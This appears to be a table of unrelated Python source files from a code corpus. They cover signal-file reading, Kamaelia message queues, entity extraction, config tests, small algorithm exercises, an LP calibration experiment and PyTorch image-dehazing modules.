content | type |
---|---|
import numpy as np
import sys
from PyQt5 import QtCore, QtGui, QtWidgets
import matplotlib.pyplot as plt
from matplotlib.widgets import Slider, Button #, RadioButtons
import scipy.signal as ss
from binary_file_options import Ui_MainWindow
def get_raw_data_from_binary_file(fname,offset_samples,duration_samples,bit_depth,num_of_channels):
f=open(fname,'rb')
offset_bytes=offset_samples*(bit_depth//8)*num_of_channels
# print(offset_bytes)
f.seek(offset_bytes,0)
data_raw=f.read(int(duration_samples*int(bit_depth/8)*num_of_channels))
f.close()
return data_raw
def raw_to_complex_volts(data_raw,nc,v_range,bit_depth=16):
if bit_depth==16:
data=np.frombuffer(data_raw,dtype=np.int16)  # np.fromstring is deprecated for binary input
data=np.reshape(data,(nc,int(len(data_raw)/nc/2)),'F')*v_range/32767
data_complex=np.zeros((int(nc/2),int(len(data_raw)/nc/2)),dtype=np.complex128)
for i in range(int(nc/2)):
data_complex[i,:]=data[2*i,:]+1j*data[2*i+1,:]
elif bit_depth==32:
data=np.frombuffer(data_raw,dtype=np.int32)
data=np.reshape(data,(nc,int(len(data_raw)/nc/4)),'F')*v_range/2147483647
data_complex=np.zeros((int(nc/2),int(len(data_raw)/nc/4)),dtype=np.complex128)
for i in range(int(nc/2)):
data_complex[i,:]=data[2*i,:]+1j*data[2*i+1,:]
return data_complex
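# A minimal usage sketch (not part of the original script), combining the two helpers
# above to read a short chunk of interleaved int16 I/Q samples and convert them to
# complex volts. The file name, channel count and voltage range are assumed values.
def _example_read_iq(fname="capture.bin"):
    raw = get_raw_data_from_binary_file(fname, offset_samples=0, duration_samples=4096,
                                        bit_depth=16, num_of_channels=4)
    iq = raw_to_complex_volts(raw, nc=4, v_range=1.0, bit_depth=16)
    return iq  # shape (2, 4096): two complex channels of 4096 samples each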
def main():
app = QtWidgets.QApplication(sys.argv)
fname, _ = QtWidgets.QFileDialog.getOpenFileName(None, "Load binary file:", "", "Binary files (*.bin *.raw);; All files (*.*)")  # PyQt5 returns (filename, selected_filter)
print(fname)
MainWindow = QtWidgets.QMainWindow()
ui = Ui_MainWindow()
ui.setupUi(MainWindow)
MainWindow.show()
# app = QtWidgets.QApplication(sys.argv)
# window = SeeProcessing()
# window.show()
# app.exec_()
sys.exit(app.exec_())
if __name__ == '__main__':
main()
|
python
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright 2010 British Broadcasting Corporation and Kamaelia Contributors(1)
#
# (1) Kamaelia Contributors are listed in the AUTHORS file and at
# http://www.kamaelia.org/AUTHORS - please extend this file,
# not this notice.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# -------------------------------------------------------------------------
import copy
import warnings
import Axon.Ipc
#local imports
from background import background
from componentWrapperInput import componentWrapperInput
from componentWrapperOutput import componentWrapperOutput
print background
import time
DEFIN = ["inbox", "control"]
DEFOUT = ["outbox", "signal"]
class likefile(object):
"""An interface to the message queues from a wrapped component, which is activated on a backgrounded scheduler."""
def __init__(self, child, extraInboxes = (), extraOutboxes = (), wrapDefault = True):
print background
if background.lock.acquire(False):
background.lock.release()
raise AttributeError, "no running scheduler found."
# prevent a catastrophe: if we treat a string like "extrainbox" as a tuple, we end up adding one new inbox per
# letter. TODO - this is inelegant code.
if not isinstance(extraInboxes, tuple):
extraInboxes = (extraInboxes, )
if not isinstance(extraOutboxes, tuple):
extraOutboxes = (extraOutboxes, )
# If the component to wrap is missing, say, "inbox", then don't fail but silently neglect to wrap it.
validInboxes = type(child).Inboxes.keys()
validOutboxes = type(child).Outboxes.keys()
inboxes = []
outboxes = []
if wrapDefault:
for i in DEFIN:
if i in validInboxes: inboxes.append(i)
for i in DEFOUT:
if i in validOutboxes: outboxes.append(i)
inboxes += list(extraInboxes)
outboxes += list(extraOutboxes)
try: inputComponent = componentWrapperInput(child, inboxes)
except KeyError, e:
raise KeyError, 'component to wrap has no such inbox: %s' % e
try: outputComponent = componentWrapperOutput(child, inputComponent, outboxes)
except KeyError, e:
del inputComponent
raise KeyError, 'component to wrap has no such outbox: %s' % e
self.inQueues = copy.copy(inputComponent.inQueues)
self.outQueues = copy.copy(outputComponent.outQueues)
# reaching into the component and its child like this is threadsafe since it has not been activated yet.
self.inputComponent = inputComponent
self.outputComponent = outputComponent
inputComponent.activate()
outputComponent.activate()
self.alive = True
# methods passed through from the queue.
def empty(self, boxname = "outbox"):
"""Return True if there is no data pending collection on boxname, False otherwise."""
return self.outQueues[boxname].empty()
def qsize(self, boxname = "outbox"):
"""Returns the approximate number of pending data items awaiting collection from boxname. Will never be smaller than the actual amount."""
return self.outQueues[boxname].qsize()
def get_nowait(self, boxname = "outbox"):
"""Equivalent to get(boxname, False)"""
return self.get(boxname, blocking = False)
def anyReady(self):
names = []
for boxname in self.outQueues.keys():
if self.qsize(boxname):
names.append(boxname)
if names != []:
return names
return None
def get(self, boxname = "outbox", blocking = True, timeout = 86400):
"""Performs a blocking read on the queue corresponding to the named outbox on the wrapped component.
raises AttributeError if the likefile is not alive. Optional parameters blocking and timeout function
the same way as in Queue objects, since that is what's used under the surface."""
print "self.get boxname ",boxname,"blocking =",blocking,"timeout=",timeout
if self.alive:
return self.outQueues[boxname].get(blocking, timeout)
# TODO - remove this.
# Specifying any timeout allows ctrl-c to interrupt the wait, even if the timeout is excessive.
# This is one day. this may be a problem, in which case retry after an "empty" exception is raised.
else: raise AttributeError, "shutdown was previously called, or we were never activated."
def put(self, msg, boxname = "inbox"):
"""Places an object on a queue which will be directed to a named inbox on the wrapped component."""
print "self.put msg", repr(msg), "boxname", boxname
if self.alive:
queue = self.inQueues[boxname]
queue.put_nowait(msg)
self.inputComponent.whatInbox.put_nowait(boxname)
else: raise AttributeError, "shutdown was previously called, or we were never activated."
def shutdown(self):
"""Sends terminatory signals to the wrapped component, and shut down the componentWrapper.
will warn if the shutdown took too long to confirm in action."""
# TODO - what if the wrapped component has no control box?
if self.alive:
self.put(Axon.Ipc.shutdown(), "control") # legacy support.
self.put(Axon.Ipc.producerFinished(), "control") # some components only honour this one
self.put(Axon.Ipc.shutdownMicroprocess(), "control") # should be last, this is what we honour
else:
raise AttributeError, "shutdown was previously called, or we were never activated."
self.inputComponent.isDead.wait(1)
if not self.inputComponent.isDead.isSet(): # we timed out instead of someone else setting the flag
warnings.warn("Timed out waiting on shutdown confirmation, may not be dead.")
self.alive = False
def __del__(self):
if self.alive:
self.shutdown()
if __name__ == "__main__":
if 1:
# So, does this code actually work? Or not?
import time
from Kamaelia.Protocol.HTTP.HTTPClient import SimpleHTTPClient
class Foing(Axon.Component.component):
def main(self):
while True:
print "."
bg = background().start()
time.sleep(1)
p = likefile(SimpleHTTPClient())
p.put("http://google.com")
p.put("http://slashdot.org")
print "X"
google = p.get()
print "Y"
slashdot = p.get()
print "Z"
time.sleep(1)
print "google is", len(google), "bytes long, and slashdot is", len(slashdot), "bytes long."
p.shutdown()
|
python
|
from goolabs import GoolabsAPI
import time
import joblib
def name_check(api_id, text_list):
"""固有表現抽出器で名前と判断された語のリストを取得
Parameters
----------
api_id : str
text_list : list[str]
ツイッターの文章のリスト
Returns
-------
name_list : list[str]
名前と判断された語(重複あり)
"""
n_list = ["鬼太郎", "ぬらりひょん", "コナン", "金田一", "モリアーティー", "ホームズ",
"水谷隼", "張本智和", "石川佳純", "丹羽孝希", "陳夢", "馬龍", "伊藤美誠", "宇田幸矢", "許キン",
"ロナウド", "リオネルメッシ", "リオネル・メッシ", "本田圭佑", "香川真司", "内田篤人", "三浦知良", "長友佑都",
"イチロー", "王貞治", "大谷翔平", "星野仙一",
]
name_list = []
api = GoolabsAPI(api_id)
# batch requests in chunks of 100 tweets; stepping by 100 avoids re-sending the
# previous chunk when len(text_list) is an exact multiple of 100
for i in range(0, len(text_list), 100):
text = "".join(text_list[i:i+100])
ne_list = api.entity(sentence=text, class_filter="PSN")["ne_list"]
for name in ne_list:
if name[0] not in n_list:
name_list.append(name[0])
time.sleep(1)
return name_list
def main():
tweet_list = joblib.load("twitter_result2")
name_check("", tweet_list)
return
if __name__ == "__main__":
main()
|
python
|
from django.contrib import admin
from .models import HeaderCTA, BlogEmbeddedCTA
# Register your models here.
admin.site.register(HeaderCTA)
admin.site.register(BlogEmbeddedCTA)
|
python
|
# -*- coding: utf-8 -*-
"""
Created on Tue Sep 24 21:08:15 2019
@author: Olivier
"""
##### predict the result before running the code #####
a=3
def test0():
"""None->None
prints a, a variable not declared inside the function"""
print("value of a in test0",a)
test0() # careful: if a is not initialized on line 9, test0 raises an error!
##### predict the result before running the code #####
def test1(a):
"""int->None
changes the value of the local variable a without returning it"""
a=1
print("value of a in test1",a,id(a))
print("before test1",a,id(a))
test1(a)
print("after calling test1",a,id(a))
##### predict the result before running the code #####
def test2(a):
"""int->int
changes the value of the local variable a and returns it"""
print("value of a in test2",a,id(a))
a=4
print("new value of a in test2",a,id(a))
return a
a=test2(a)
print("after calling test2",a,id(a))
##### predict the result before running the code #####
def test3():
"""None->None
creates a local variable b, which is not visible outside the function"""
b=10
test3()
try:
print("b = ",b) # raises an error because b does not exist outside test3
except (NameError):
print("b does not exist and therefore cannot be printed")
##### predict the result before running the code #####
def test4():
"""None->None
changes the value of a (global variable)"""
global a
print("value of a in test4",a,id(a))
a=5
print("new value of a in test4",a,id(a))
test4()
print("after calling test4",a,id(a))
|
python
|
import socket
from unittest import TestCase
from tempfile import NamedTemporaryFile
from mock import patch, Mock
from oasislmf.utils.conf import load_ini_file, replace_in_file
from oasislmf.utils.exceptions import OasisException
class LoadInIFile(TestCase):
def test_values_are_bool___values_are_correctly_converted_to_bool_value(self):
with NamedTemporaryFile(mode='w') as f:
f.writelines([
'[section]\n',
'a = True\n',
'b = False\n',
])
f.flush()
conf = load_ini_file(f.name)
self.assertTrue(conf['a'])
self.assertFalse(conf['b'])
def test_values_are_int___values_are_correctly_converted_to_int_value(self):
with NamedTemporaryFile(mode='w') as f:
f.writelines([
'[section]\n',
'a = 1\n',
'b = 2\n',
])
f.flush()
conf = load_ini_file(f.name)
self.assertEqual(1, conf['a'])
self.assertEqual(2, conf['b'])
def test_values_are_float___values_are_correctly_converted_to_float_value(self):
with NamedTemporaryFile(mode='w') as f:
f.writelines([
'[section]\n',
'a = 1.1\n',
'b = 2.2\n',
])
f.flush()
conf = load_ini_file(f.name)
self.assertEqual(1.1, conf['a'])
self.assertEqual(2.2, conf['b'])
def test_values_are_ip_addresses___values_are_converted_into_ip_string_format(self):
with NamedTemporaryFile(mode='w') as f:
f.writelines([
'[section]\n',
'a = 127.0.0.1\n',
'b = 127.127.127.127\n',
])
f.flush()
conf = load_ini_file(f.name)
ipf = lambda s: socket.inet_ntoa(socket.inet_aton(s))
self.assertEqual(ipf('127.0.0.1'), conf['a'])
self.assertEqual(ipf('127.127.127.127'), conf['b'])
def test_values_are_string_values___values_are_unchanged(self):
with NamedTemporaryFile(mode='w') as f:
f.writelines([
'[section]\n',
'a = first.value\n',
'b = another value\n',
])
f.flush()
conf = load_ini_file(f.name)
self.assertEqual('first.value', conf['a'])
self.assertEqual('another value', conf['b'])
def test_io_error_is_raised_when_opening_file___exception_is_converted_to_oasis_exception(self):
def raising_function(*args, **kwargs):
raise IOError()
with patch('io.open', Mock(side_effect=raising_function)), self.assertRaises(OasisException):
load_ini_file('file_name')
class ReplaceInFile(TestCase):
def test_more_var_names_are_given_than_values___error_is_raised(self):
with self.assertRaises(OasisException):
replace_in_file('first_path', 'second_path', ['fist_arg', 'second_arg'], ['first_val'])
def test_more_var_values_are_given_than_values___error_is_raised(self):
with self.assertRaises(OasisException):
replace_in_file('first_path', 'second_path', ['fist_arg'], ['first_val', 'second_val'])
def test_input_file_does_not_include_any_var_names___file_is_unchanged(self):
with NamedTemporaryFile(mode='w') as input_file, NamedTemporaryFile(mode='r') as output_file:
input_file.writelines([
'some_var some_val\n',
])
input_file.flush()
replace_in_file(input_file.name, output_file.name, ['first_arg', 'second_arg'], ['first_val', 'second_val'])
output_file.seek(0)
data = output_file.read()
self.assertEqual('some_var some_val\n', data)
def test_input_file_includes_some_var_names___input_names_are_replaced_with_values(self):
with NamedTemporaryFile(mode='w') as input_file, NamedTemporaryFile(mode='r') as output_file:
input_file.writelines([
'some_var first_arg\n',
])
input_file.flush()
replace_in_file(input_file.name, output_file.name, ['first_arg', 'second_arg'], ['first_val', 'second_val'])
output_file.seek(0)
data = output_file.read()
self.assertEqual('some_var first_val\n', data)
def test_io_error_is_raised_when_opening_file___exception_is_converted_to_oasis_exception(self):
def raising_function(*args, **kwargs):
raise IOError()
with patch('io.open', Mock(side_effect=raising_function)), self.assertRaises(OasisException):
replace_in_file('in', 'out', ['first_arg', 'second_arg'], ['first_val', 'second_val'])
def test_os_error_is_raised_when_opening_file___exception_is_converted_to_oasis_exception(self):
def raising_function(*args, **kwargs):
raise OSError()
with patch('io.open', Mock(side_effect=raising_function)), self.assertRaises(OasisException):
replace_in_file('in', 'out', ['first_arg', 'second_arg'], ['first_val', 'second_val'])
|
python
|
n = int(input())
ratings = [int(input()) for _ in range(n)]
candies = [1] * n
for i in range(1, n):
if ratings[i] > ratings[i-1]:
candies[i] = candies[i-1] + 1
#print (candies)
for i in reversed(range(1, n)):
if ratings[i] < ratings[i-1]:
candies[i-1] = max(candies[i-1], candies[i]+1)
print (sum(candies))
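# A worked example of the same two-pass greedy idea, wrapped in a function so it can be
# checked without stdin (illustrative sketch, not part of the original submission):
def min_candies(ratings):
    candies = [1] * len(ratings)
    for i in range(1, len(ratings)):            # left-to-right: reward rising ratings
        if ratings[i] > ratings[i - 1]:
            candies[i] = candies[i - 1] + 1
    for i in reversed(range(1, len(ratings))):  # right-to-left: fix falling ratings
        if ratings[i] < ratings[i - 1]:
            candies[i - 1] = max(candies[i - 1], candies[i] + 1)
    return sum(candies)

assert min_candies([1, 2, 2]) == 4  # candy distribution [1, 2, 1]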
|
python
|
try:
from setuptools import setup, find_packages
except ImportError:
from distutils.core import setup
VERSION = '2.0.1'
setup(
name='usabilla-api',
version=VERSION,
description="Python client for Usabilla API",
license='MIT',
install_requires=['urllib3', 'requests'],
packages=find_packages(),
py_modules=['usabilla'],
author='Usabilla',
author_email='[email protected]',
url='https://github.com/usabilla/api-python',
download_url='https://github.com/usabilla/api-python/tarball/%s' % VERSION,
test_suite='tests'
)
|
python
|
import os
from shutil import copyfile
import lxml.etree as etree
os.chdir("../")
operating_system = 'Linux'
target_level_path = '../level_variations/generated_levels/fourth generation'
origin_level_path = '../buildgame/{}/9001_Data/StreamingAssets/Levels/novelty_level_1/type1/Levels/'.format(operating_system)
game_level_path = '9001_Data/StreamingAssets/Levels/novelty_level_1/type1/Levels/'
game_config_path = '../buildgame/{}/config.xml'.format(operating_system)
# for each template, move 20 levels
hi_levels = os.listdir(target_level_path)
# remove all the levels in self.origin_level_path
old_levels = os.listdir(origin_level_path)
for old_level in old_levels:
os.remove(os.path.join(origin_level_path, old_level))
total_template_level_path = []
for level in hi_levels:
capabilites = os.listdir(os.path.join(target_level_path,level))
for capability in capabilites:
templates = os.listdir(os.path.join(target_level_path,level,capability))
for template in templates:
game_levels = os.listdir(os.path.join(target_level_path,level,capability,template))
for game_level in game_levels[:20]:
src_path = os.path.join(target_level_path,level,capability,template,game_level)
dst_path = os.path.join(origin_level_path, game_level)
copyfile(src_path, dst_path)
total_template_level_path.append(os.path.join(game_level_path, game_level))
parser = etree.XMLParser(encoding='UTF-8')
game_config = etree.parse(game_config_path, parser=parser)
config_root = game_config.getroot()
# remove old level path
for level in list(config_root[1][0][0]):
config_root[1][0][0].remove(level)
# add new level path
for l in total_template_level_path:
new_level = etree.SubElement(config_root[1][0][0], 'game_levels')
new_level.set('level_path', l)
# add a repeated level for the weird not-loading-last-level bug
new_level = etree.SubElement(config_root[1][0][0], 'game_levels')
new_level.set('level_path', l)
game_config.write(game_config_path)
|
python
|
from random import randint
number = randint(1, 100)
print("Guess a number between 1 and 100")
#print(number)
while True:
guess = int(input("Enter guess:"))
if guess < number:
print("Too low")
elif guess > number:
print("Too high")
else:
break
print("Correct!")
|
python
|
# DESCRIPTION
# You are a product manager and currently leading a team to develop a new product.
# Unfortunately, the latest version of your product fails the quality check.
# Since each version is developed based on the previous version, all the versions after a bad version are also bad.
# Suppose you have n versions [1, 2, ..., n] and you want to find out the first bad one,
# which causes all the following ones to be bad.
# You are given an API bool isBadVersion(version) which will return whether version is bad.
# Implement a function to find the first bad version. You should minimize the number of calls to the API.
# EXAMPLE:
# Given n = 5, and version = 4 is the first bad version.
# call isBadVersion(3) -> false
# call isBadVersion(5) -> true
# call isBadVersion(4) -> true
# Then 4 is the first bad version.
# The isBadVersion API is already defined for you.
# @param version, an integer
# @return a bool
# def isBadVersion(version):
class Solution:
'''
Time: O(LOG N), binary search
Space: O(1), no extra data structures
'''
def firstBadVersion(self, n):
"""
:type n: int
:rtype: int
"""
left = 1  # versions are numbered 1..n, so never probe version 0
right = n
# binary search iterative
# if the target has duplicate then this grabs the leftmost element
while left < right:
mid = left + (right - left) // 2
if isBadVersion(mid) == False:
left = mid + 1
else:
right = mid
return left
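# Quick self-check sketch (not part of the original solution): stub the isBadVersion API
# locally so the binary search above can be exercised. first_bad = 4 is an assumed value.
if __name__ == "__main__":
    first_bad = 4
    def isBadVersion(version):
        return version >= first_bad
    print(Solution().firstBadVersion(5))  # expected output: 4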
|
python
|
"""
Description: This script calibrates results from the LP solution.
Probabilistically selects ASYMPs.
Then computes metric features from those.
"""
from utils.networkx_operations import *
from utils.pandas_operations import *
from utils.time_operations import *
from tqdm import tqdm
import pandas as pd
import numpy as np
import copy
import argparse
from sklearn.metrics import accuracy_score, precision_score, recall_score, f1_score, matthews_corrcoef
def compute_metric_measures(ASYMP, ASYMP_pred):
accuracy = accuracy_score(ASYMP, ASYMP_pred)
precision = precision_score(ASYMP, ASYMP_pred)
recall = recall_score(ASYMP, ASYMP_pred)
f1 = f1_score(ASYMP, ASYMP_pred)
TP = (ASYMP & ASYMP_pred).sum()
MCC = matthews_corrcoef(ASYMP, ASYMP_pred)
return accuracy, precision, recall, f1, TP, MCC
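# A small illustrative check of compute_metric_measures on hand-made arrays
# (assumed toy data, not from the original experiment):
def _example_metric_check():
    ASYMP = np.array([True, True, False, False])
    ASYMP_pred = np.array([True, False, True, False])
    # expected: accuracy 0.5, precision 0.5, recall 0.5, f1 0.5, TP 1, MCC 0.0
    return compute_metric_measures(ASYMP, ASYMP_pred)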
def update_metric_arrays(idx_gamma, idx_beta, idx_alpha, idx_cnt):
accuracy_array[idx_gamma, idx_beta, idx_alpha, idx_cnt] = accuracy
precision_array[idx_gamma, idx_beta, idx_alpha, idx_cnt] = precision
recall_array[idx_gamma, idx_beta, idx_alpha, idx_cnt] = recall
f1_array[idx_gamma, idx_beta, idx_alpha, idx_cnt] = f1
TP_array[idx_gamma, idx_beta, idx_alpha, idx_cnt] = TP
MCC_array[idx_gamma, idx_beta, idx_alpha, idx_cnt] = MCC
n_ASYMP_array[idx_gamma, idx_beta, idx_alpha, idx_cnt] = n_ASYMP
if __name__ == "__main__":
gamma_list = [0, 16, 128]
beta_list = [1, 2, 4]
alpha_list = [0] + [pow(2, x) for x in range(9)]
x = 1
n_sample = 10
# here, n_sample+1 because we save one more set of ASYMP by choosing only those with y in sum prob = 1
accuracy_array = np.zeros((len(gamma_list), len(beta_list), len(alpha_list), n_sample))
precision_array = np.zeros((len(gamma_list), len(beta_list), len(alpha_list), n_sample))
recall_array = np.zeros((len(gamma_list), len(beta_list), len(alpha_list), n_sample))
f1_array = np.zeros((len(gamma_list), len(beta_list), len(alpha_list), n_sample))
TP_array = np.zeros((len(gamma_list), len(beta_list), len(alpha_list), n_sample)).astype(int)
MCC_array = np.zeros((len(gamma_list), len(beta_list), len(alpha_list), n_sample))
n_ASYMP_array = np.zeros((len(gamma_list), len(beta_list), len(alpha_list), n_sample)).astype(int)
for idx_gamma, gamma in enumerate(gamma_list):
for idx_beta, beta in enumerate(beta_list):
# if idx_gamma==2 and idx_beta==2:
# break
for idx_alpha, alpha in enumerate(alpha_list):
print("gamma: {}, beta: {}, alpha: {}".format(gamma, beta, alpha))
# print("Loading G...")
G = nx.read_graphml("data/G_synthetic_step2_beta{}_x{}_v3.graphml".format(int(beta), int(x)))
G = relabel_nodes_str_to_tuple(G)
# print(nx.info(G))
X = set([v for v in G.nodes() if G.nodes[v]["terminal"]])
len_X = len(X)
k = len_X
r = (0, -1)
add_dummy_node(G, r, 0.0, gamma)
G.nodes[r]["ASYMP"]=False
G.nodes[r]["ASYMP_pred"]=False
print("Update edge weights by subtracting scaled up the node weights")
W_over_k = alpha * sum([G.nodes[v]["prob"] for v in G.nodes()]) / k
for e in G.edges():
src = e[0]
dst = e[1]
weight = G.edges[src, dst]["weight"]
if dst in X:
adj_weight = weight + W_over_k
# print(G.nodes[dst]["prob"])
else:
adj_weight = weight - alpha * G.nodes[dst]["prob"]
G.edges[src, dst]["weight"] = adj_weight
ASYMP = np.array([G.nodes[v]["ASYMP"] for v in G.nodes()])
print("Loading G_solution...")
G_solution = nx.read_graphml("result/synthetic_LP_month1_beta{}_gamma{}_alpha{}_v3.graphml".format(int(beta), int(gamma), int(alpha)))
G_solution = relabel_nodes_str_to_tuple(G_solution)
print(nx.info(G_solution))
#################################################################################################
# Now select ASYMP probabilistically.
sum_in_y_array = np.zeros((len(G)))
for idx, v in enumerate(G.nodes()):
if v in G_solution:
sum_in_y_array[idx] = sum([G_solution.edges[e]["flow"] for e in G_solution.in_edges(v)])
# some y values have 1.0000000000002, which causes an error when calling np.random.binomial
sum_in_y_array = np.clip(sum_in_y_array, 0, 1)
idx_cnt = 0
for i in range(10):
ASYMP_pred = np.random.binomial(1, sum_in_y_array).astype(bool)
# ASYMP_pred = ASYMP_pred | ASYMP_sampled
accuracy, precision, recall, f1, TP, MCC = compute_metric_measures(ASYMP, ASYMP_pred)
n_ASYMP = ASYMP_pred.sum()
print("nASYMP: {}, Acc: {:.3f}, Prec: {:.3f}, Rec: {:.3f}, f1: {:.3f}, TP: {}, MCC:{:.3f}".format(n_ASYMP, accuracy, precision, recall, f1, TP, MCC))
update_metric_arrays(idx_gamma, idx_beta, idx_alpha, idx_cnt)
idx_cnt += 1
# save results
print("Saving results as npz/LP/EXP1_LP.npz")
np.savez("npz/LP/EXP1_LP".format(int(x)),
accuracy_array=accuracy_array,
precision_array=precision_array,
recall_array=recall_array,
f1_array=f1_array,
TP_array=TP_array,
MCC_array=MCC_array,
n_ASYMP_array=n_ASYMP_array
)
|
python
|
import rubrik_cdm
rubrik = rubrik_cdm.Connect()
username = "python-sdk-read-only"
read_only_permission = rubrik.read_only_authorization(username)
|
python
|
import torch
import torch.nn as nn
import numpy as np
class AttentionGate(nn.Module):
def __init__(self, x_ch, g_ch, mid_ch, scale):
super(AttentionGate, self).__init__()
self.scale = scale
self.conv_g = nn.Conv2d(in_channels=g_ch, out_channels=mid_ch, kernel_size=1, bias=True)
self.conv_x = nn.Conv2d(in_channels=x_ch, out_channels=mid_ch, kernel_size=1, stride=scale)
self.relu = nn.ReLU(inplace=True)
self.conv_epsi = nn.Conv2d(in_channels=mid_ch, out_channels=1, kernel_size=1, bias=True)
self.sigm = nn.Sigmoid()
def forward(self, x, g):
attn = self.relu(self.conv_g(g) + self.conv_x(x))
attn = self.sigm(self.conv_epsi(attn))
return nn.functional.interpolate(attn, scale_factor=self.scale) * x
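# Shape sanity-check sketch for AttentionGate (assumed toy sizes, not from the original
# code): x is a high-resolution skip feature, g a coarser gating signal; the gate
# returns x re-weighted by an attention map upsampled back to x's resolution.
def _example_attention_gate():
    gate = AttentionGate(x_ch=64, g_ch=128, mid_ch=32, scale=2)
    x = torch.randn(1, 64, 32, 32)
    g = torch.randn(1, 128, 16, 16)
    out = gate(x, g)
    return out.shape  # torch.Size([1, 64, 32, 32])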
class JGenerate(nn.Module):
def __init__(self, epsilon=1e-4):
super(JGenerate, self).__init__()
self.epsilon = epsilon
def forward(self, A, t, I):
# self.epsilon = 1e-10
return (I - A)/(t + self.epsilon) + A
class BReLU(nn.Module):
def __init__(self, inplace=True):
super(BReLU, self).__init__()
# self.relu = nn.ReLU(inplace=inplace)
self.relu6 = nn.ReLU6(inplace=inplace)
def forward(self, x):
# out = self.relu(x)
# return 1 - self.relu(1 - out)
return self.relu6(6*x)/6
class DarkChannel(nn.Module):
def __init__(self, window_size):
super(DarkChannel, self).__init__()
self.mxpool = nn.MaxPool2d(kernel_size=window_size, stride=1, padding=(window_size-1)//2)
def forward(self, x):
neg_x_pooled = self.mxpool(-1*x)
return -1*(neg_x_pooled.max(dim=1, keepdim=True)[0])
def generate_mask(J, A, t, t_th, A_th, t_sl, A_sl, eps=1e-4):
# closer to one at unclear regions
t_relu = torch.sigmoid(t_sl*(t_th - t))  # torch.nn.functional.sigmoid is deprecated
A_relu = torch.sigmoid(A_sl*((A / (J + eps)).mean(dim=1, keepdim=True) - A_th))
total_relu = t_relu * A_relu
return total_relu
def generate_J(I, A, t, eps=1e-4):
return (I - A)/(t + eps) + A
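# generate_J (and JGenerate above) inverts the atmospheric scattering model
# I = J*t + A*(1 - t), i.e. J = (I - A)/t + A. A minimal sketch with toy tensors
# (assumed shapes, not from the original training code):
def _example_dehaze():
    I = torch.rand(1, 3, 8, 8)               # hazy input image
    A = torch.rand(1, 3, 1, 1)               # global atmospheric light
    t = torch.rand(1, 1, 8, 8) * 0.9 + 0.1   # transmission map in (0.1, 1.0]
    J = generate_J(I, A, t)                  # estimated haze-free radiance
    return J.shape                           # torch.Size([1, 3, 8, 8])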
def correlation_coef(x, y):
vx = x - torch.mean(x, dim=(1, 2, 3), keepdim=True)
vy = y - torch.mean(y, dim=(1, 2, 3), keepdim=True)
return (torch.sum(vx * vy, dim=(1, 2, 3)) / (torch.sqrt(torch.sum(vx ** 2, dim=(1, 2, 3))) * torch.sqrt(torch.sum(vy ** 2, dim=(1, 2, 3))))).mean()
class EdgePreservingMSE(nn.Module):
def __init__(self, factor=0.1, std_dev=1.0):
super(EdgePreservingMSE, self).__init__()
self.mu = factor
eye = torch.eye(3).type(torch.DoubleTensor).unsqueeze(-1).unsqueeze(-1)
filter_size = 5
generated_filters = torch.from_numpy(np.array([[np.exp(-(ix*ix + iy*iy)/(2*std_dev*std_dev))/np.sqrt(2*np.pi*std_dev*std_dev)
for ix in range(-filter_size//2 + 1, filter_size//2 + 1)]
for iy in range(-filter_size//2 + 1, filter_size//2 + 1)], dtype=np.float64))
self.gaussian_filter = nn.Conv2d(in_channels=3, out_channels=3, kernel_size=filter_size, padding=(filter_size - 1)//2, bias=False)
self.gaussian_filter.weight.data.copy_(generated_filters*eye)
sobel_filter = torch.from_numpy(np.array([[1, 0, -1],
[2, 0, -2],
[1, 0, -1]], dtype=np.float64).reshape([1, 1, 3, 3])) * eye
self.sobel_filter_horizontal = nn.Conv2d(in_channels=3, out_channels=3, kernel_size=3, padding=1, bias=False)
self.sobel_filter_horizontal.weight.data.copy_(sobel_filter)
self.sobel_filter_vertical = nn.Conv2d(in_channels=3, out_channels=3, kernel_size=3, padding=1, bias=False)
self.sobel_filter_vertical.weight.data.copy_(sobel_filter.transpose(2, 3))
self.sobel_filter_vertical.weight.requires_grad = False
self.sobel_filter_horizontal.weight.requires_grad = False
self.gaussian_filter.weight.requires_grad = False
def forward(self, net_output, target):
with torch.no_grad():
blurred_img = self.gaussian_filter(target)
grad_x = self.sobel_filter_horizontal(blurred_img)
grad_y = self.sobel_filter_vertical(blurred_img)
factor = 1 + self.mu*torch.sqrt(grad_x ** 2 + grad_y ** 2)
return (factor*((net_output - target)**2)).mean()
class PReLU2sided(nn.Module):
def __init__(self, init_negative=0.1, init_positive=0.1):
super(PReLU2sided, self).__init__()
# self.relu = nn.ReLU(inplace=inplace)
self.relu = nn.PReLU(init=init_negative)
self.reversed_relu = nn.PReLU(init=init_positive)
def forward(self, x):
out = self.relu(x)
return 1 - self.reversed_relu(1 - out)
class LeakyReLU2sided(nn.Module):
def __init__(self, init_negative=0.01, init_positive=0.01, inplace=True):
super(LeakyReLU2sided, self).__init__()
# self.relu = nn.ReLU(inplace=inplace)
self.relu = nn.LeakyReLU(negative_slope=init_negative, inplace=inplace)
self.reversed_relu = nn.LeakyReLU(negative_slope=init_positive, inplace=inplace)
def forward(self, x):
out = self.relu(x)
return 1 - self.reversed_relu(1 - out)
class func_clamp_noderiv(torch.autograd.Function):
@staticmethod
def forward(ctx, i, min_val, max_val):
ctx._mask = (i.ge(min_val) * i.le(max_val))
return i.clamp(min_val, max_val)
@staticmethod
def backward(ctx, grad_output):
mask = torch.autograd.Variable(ctx._mask.type_as(grad_output.data))
return grad_output * mask, None, None
# return grad_output, None, None
|
python
|
"""
Loader and Parser for the txt format.
Version: 0.01-beta
"""
from konbata.Data.Data import DataNode, DataTree
from konbata.Formats.Format import Format
def txt_toTree(file, delimiter=None, options=None):
"""
Function transforms a txt file into a DataTree.
Parameters
----------
file: file
open input file in at least read mode
delimiter: TODO
options: list, optional
Returns
-------
tree: DataTree
"""
tree = DataTree(tree_type='txt')
# TODO add more options
# TODO add column or row storage
col0 = DataNode('')
for row in file.readlines():
col0.add(DataNode(row))
tree.root.add(col0)
return tree
def txt_fromTree(tree, file, options=None):
"""
Function transforms a DataTree into a txt file.
Parameters
----------
tree: DataTree
file: file
open output file in at least write mode
options: list, optional
"""
if not isinstance(tree, DataTree):
raise TypeError('tree must be type of DataTree')
output = tree.generate_string_representation()
file.writelines(output)
